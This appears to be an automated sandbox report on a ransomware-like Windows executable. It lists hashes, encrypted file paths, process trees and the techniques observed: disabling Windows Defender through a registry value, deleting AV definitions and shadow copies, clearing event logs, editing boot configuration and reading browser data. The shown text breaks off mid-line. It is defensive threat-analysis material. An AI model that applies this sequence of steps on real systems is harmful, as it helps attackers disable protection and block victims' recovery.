Resubmissions
12-01-2022 19:42
220112-ye478adgd4 1012-01-2022 19:26
220112-x5vwssdgej 1012-01-2022 16:57
220112-vgqwtsdce7 10Analysis
-
max time kernel
180s -
max time network
197s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
Resource
win10-en-20211208
General
-
Target
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
-
Size
3.3MB
-
MD5
257cd3ef7ac49a4b7942f7b61ca10b6c
-
SHA1
a0043163d33e25ba2a62c5061fd641c44807b492
-
SHA256
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5
-
SHA512
bb9dded0fa261da418b3b0b14cfa72e4688f378bfe5814a0df45a01eb6d4b2ada6f56fb3151b75e6c8118dffd80e3e79c084befbcdfeeef851926e6faa4158db
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1148 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3200 bcdedit.exe 1272 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8268_24x24x32.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_f_1wMDVBoXs0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_v7PZJsPyMFc0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL111.XML.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_a6Rm77wQty40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_targetsize-20.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_1kRFEME2wvA0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\credits.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_VIorrmtPhA80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\EppManifest.dll.mui 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_5WCd0wk-N5o0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-125.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_eXeCaIY4gDY0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\9.jpg 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-unplated_contrast-black.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\5601_32x32x32.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-125.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreLogo.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_field_grabber.png.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_oDNRp9Mk3B40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-oob.xrm-ms.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_32i-_xDJQf40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.man.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_C13sZbZphzg0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_KXFYy987-bE0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\SmallTile.scale-125.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\ws_16x11.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_6oKDKnJar-g0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteWideTile.scale-400.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_eKlLvDFWw-Y0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_5jq7K-gFsRc0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxManifest.xml 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-30_altform-unplated_contrast-high.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-200.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\SpotlightCalendar_2016-05.gif 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe\resources.pri 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-100.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_jRfcBSsjEiw0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\rain.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_Lt9GOg1mzoI0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\REFINED.ELM.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_9bup867M4PQ0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rounded Rectangle.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim1.smile.scale-200.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-32.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_WN8U8pkBZ4o0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\sl-SI\tipresx.dll.mui 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Internet Explorer\fr-FR\ieinstal.exe.mui 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\ja-JP\msader15.dll.mui.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_kWG_H7pXxxQ0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Generic-Dark.scale-150.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_RkfkyDuurp00.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_zpQPZhu0Tu40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXC.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_GDF3CB0eLI80.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\Attribution\holiday_weather.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_UPTyrGk1X3U0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_d5PVQKyJXsg0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_tKG_GETeObo0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\file_icons.png.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_Jt_GuCZyQMU0.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\move.scale-180.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js.r-yMo1buHF41f5I656d1PBcs9ld7COHMVdY2G2_e-7v_MxKJaQ1B4a40.qyxdq 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-white.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\8px.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Perfect\ribbon_1.png 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Styling\css\PhoneLight.css 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3080 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exepid process 724 powershell.exe 724 powershell.exe 724 powershell.exe 3280 powershell.exe 3280 powershell.exe 3280 powershell.exe 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3908 wevtutil.exe Token: SeBackupPrivilege 3908 wevtutil.exe Token: SeSecurityPrivilege 1144 wevtutil.exe Token: SeBackupPrivilege 1144 wevtutil.exe Token: SeSecurityPrivilege 3176 wevtutil.exe Token: SeBackupPrivilege 3176 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3236 wmic.exe Token: SeSecurityPrivilege 3236 wmic.exe Token: SeTakeOwnershipPrivilege 3236 wmic.exe Token: SeLoadDriverPrivilege 3236 wmic.exe Token: SeSystemProfilePrivilege 3236 wmic.exe Token: SeSystemtimePrivilege 3236 wmic.exe Token: SeProfSingleProcessPrivilege 3236 wmic.exe Token: SeIncBasePriorityPrivilege 3236 wmic.exe Token: SeCreatePagefilePrivilege 3236 wmic.exe Token: SeBackupPrivilege 3236 wmic.exe Token: SeRestorePrivilege 3236 wmic.exe Token: SeShutdownPrivilege 3236 wmic.exe Token: SeDebugPrivilege 3236 wmic.exe Token: SeSystemEnvironmentPrivilege 3236 wmic.exe Token: SeRemoteShutdownPrivilege 3236 wmic.exe Token: SeUndockPrivilege 3236 wmic.exe Token: SeManageVolumePrivilege 3236 wmic.exe Token: 33 3236 wmic.exe Token: 34 3236 wmic.exe Token: 35 3236 wmic.exe Token: 36 3236 wmic.exe Token: SeIncreaseQuotaPrivilege 2832 wmic.exe Token: SeSecurityPrivilege 2832 wmic.exe Token: SeTakeOwnershipPrivilege 2832 wmic.exe Token: SeLoadDriverPrivilege 2832 wmic.exe Token: SeSystemProfilePrivilege 2832 wmic.exe Token: SeSystemtimePrivilege 2832 wmic.exe Token: SeProfSingleProcessPrivilege 2832 wmic.exe Token: SeIncBasePriorityPrivilege 2832 wmic.exe Token: SeCreatePagefilePrivilege 2832 wmic.exe Token: SeBackupPrivilege 2832 wmic.exe Token: SeRestorePrivilege 2832 wmic.exe Token: SeShutdownPrivilege 2832 wmic.exe Token: SeDebugPrivilege 2832 wmic.exe Token: SeSystemEnvironmentPrivilege 2832 wmic.exe Token: SeRemoteShutdownPrivilege 2832 wmic.exe Token: SeUndockPrivilege 2832 wmic.exe Token: SeManageVolumePrivilege 2832 wmic.exe Token: 33 2832 wmic.exe Token: 34 2832 wmic.exe Token: 35 2832 wmic.exe Token: 36 2832 wmic.exe Token: SeIncreaseQuotaPrivilege 2832 wmic.exe Token: SeSecurityPrivilege 2832 wmic.exe Token: SeTakeOwnershipPrivilege 2832 wmic.exe Token: SeLoadDriverPrivilege 2832 wmic.exe Token: SeSystemProfilePrivilege 2832 wmic.exe Token: SeSystemtimePrivilege 2832 wmic.exe Token: SeProfSingleProcessPrivilege 2832 wmic.exe Token: SeIncBasePriorityPrivilege 2832 wmic.exe Token: SeCreatePagefilePrivilege 2832 wmic.exe Token: SeBackupPrivilege 2832 wmic.exe Token: SeRestorePrivilege 2832 wmic.exe Token: SeShutdownPrivilege 2832 wmic.exe Token: SeDebugPrivilege 2832 wmic.exe Token: SeSystemEnvironmentPrivilege 2832 wmic.exe Token: SeRemoteShutdownPrivilege 2832 wmic.exe Token: SeUndockPrivilege 2832 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3156 wrote to memory of 2336 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 2336 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 2336 wrote to memory of 1328 2336 net.exe net1.exe PID 2336 wrote to memory of 1328 2336 net.exe net1.exe PID 3156 wrote to memory of 2836 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 2836 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 2836 wrote to memory of 3272 2836 net.exe net1.exe PID 2836 wrote to memory of 3272 2836 net.exe net1.exe PID 3156 wrote to memory of 3584 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 3584 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3584 wrote to memory of 2320 3584 net.exe net1.exe PID 3584 wrote to memory of 2320 3584 net.exe net1.exe PID 3156 wrote to memory of 3064 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 3064 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3064 wrote to memory of 2736 3064 net.exe net1.exe PID 3064 wrote to memory of 2736 3064 net.exe net1.exe PID 3156 wrote to memory of 2540 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 2540 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 2540 wrote to memory of 3704 2540 net.exe net1.exe PID 2540 wrote to memory of 3704 2540 net.exe net1.exe PID 3156 wrote to memory of 2872 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 2872 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 2872 wrote to memory of 3208 2872 net.exe net1.exe PID 2872 wrote to memory of 3208 2872 net.exe net1.exe PID 3156 wrote to memory of 420 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 420 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 420 wrote to memory of 3996 420 net.exe net1.exe PID 420 wrote to memory of 3996 420 net.exe net1.exe PID 3156 wrote to memory of 3000 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 3000 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3000 wrote to memory of 2804 3000 net.exe net1.exe PID 3000 wrote to memory of 2804 3000 net.exe net1.exe PID 3156 wrote to memory of 1832 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 3156 wrote to memory of 1832 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1832 wrote to memory of 1240 1832 net.exe net1.exe PID 1832 wrote to memory of 1240 1832 net.exe net1.exe PID 3156 wrote to memory of 368 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 368 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 1912 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 1912 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 980 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 980 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 1260 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 1260 3156 